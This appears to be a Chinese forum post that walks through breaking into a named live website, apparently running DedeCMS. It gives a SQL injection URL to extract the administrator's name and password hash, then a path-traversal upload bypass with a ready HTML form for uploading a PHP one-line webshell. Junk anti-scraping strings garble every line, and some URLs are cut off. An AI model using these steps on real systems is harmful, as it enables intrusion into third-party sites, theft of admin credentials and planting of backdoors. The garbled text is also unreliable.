①注入漏洞。, _4 M- n% ?9 ]$ d
这站 http://www.political-security.com/. ~2 J y& R" i1 r( S }
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,& Q' ^1 D# H& g$ _
www.political-security.com/data/mysql_error_trace.inc 爆后台+ v" |8 F! a! R4 }1 c
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
5 q2 q/ f3 z4 T0 w" F8 a& ?( N然后写上语句
% @# q r/ W+ c! D. T$ L查看管理员帐号$ g: E" k9 s' E3 t
http://www.political-security.co ... &membergroup=@`3 o/ A$ Q$ k- O
* Q+ N2 i; K/ b& ]' y2 @2 M
admin
3 b3 [! T# v6 y5 E8 p
; Z$ t9 b+ B/ Z0 S) W查看管理员密码. y: J3 ~7 Q7 ]' Q( V' M4 w
http://www.political-security.co ... &membergroup=@`
5 V3 E+ F. J- q4 k) L
1 L$ o4 [* i9 {$ L$ o8 z. T+ w& `8d29b1ef9f8c5a5af429. }& q+ T$ |: l3 f9 u
. m! ]( Z" y- I+ S: B查看管理员密码) u( U7 \) L B3 K
3 B5 k8 `8 g2 d% P1 y2 X8 n
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
7 S& r; l9 |5 x0 C9 P. l; f8 |7 ~0 l0 E' U8 Q
8d2
# B4 Z9 k7 N+ S9 m! a3 U4 {9b1ef9f8c5a5af42
' P$ K# E" y0 w( @0 j3 A0 i98 z8 n% v9 m% ?; G
- ]6 F9 g0 _, }5 y- Y
cmd5没解出来 只好测试第二个方法
, z& c0 e8 ^1 c' }9 l L4 ^" I8 e) ?) G' W( X+ N" |
; F1 \" G9 q$ V+ j) A4 `! K% Z②上传漏洞:: u2 I5 |1 ? E2 ^3 `( i
- _9 d+ f1 _* g( p5 _; M
只要登陆会员中心,然后访问页面链接
9 M3 I; h( Y4 F# Q* ^1 l“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”% a1 T; o5 o4 `- r- F- S
* }8 p+ ?, A5 O) ~2 X* e
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”" Q: W: P! V$ L+ k
6 h, a' ?/ q6 q于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm) Y+ R# W2 G8 ]# R. [
( K, D, j+ N4 w
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
9 E% X) j5 e: d- S或者
. v" o( R$ o+ \, q1 S即可上传成功 |